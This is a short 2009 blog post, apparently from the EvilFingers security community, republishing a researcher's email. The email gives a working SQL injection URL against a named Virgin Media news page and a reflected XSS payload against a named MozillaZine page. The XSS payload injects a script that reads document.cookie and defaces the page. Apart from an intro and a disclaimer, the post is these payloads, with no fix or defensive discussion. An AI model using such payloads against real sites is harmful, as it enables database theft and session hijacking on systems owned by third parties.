Saturday, January 17, 2009

SQL Injection and XSS Vulnerabilities

Rohit Bansal, an active member of the security research community, has been submitting XSS and SQL Injection vulnerabilities to the PacketStormSecurity and XSSed websites.

He sent us the following to publish on our blog:

*** PASTED FROM Rohit Bansal's EMAIL ***

SQL Injection:

Vuln: http://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+ and 1=0 Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10

XSS:

http://www.mozillazine.org/talkback.html?article=26260%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cmarquee%3E%3Ch2%3EXSS%20By%20Evilfingers%3Ch2%3E%3C/script%3E

*** PASTED FROM Rohit Bansal's EMAIL ***

Disclaimer: EvilFingers community is not responsible for any of the information pasted above. Read our Legal section.

- EF
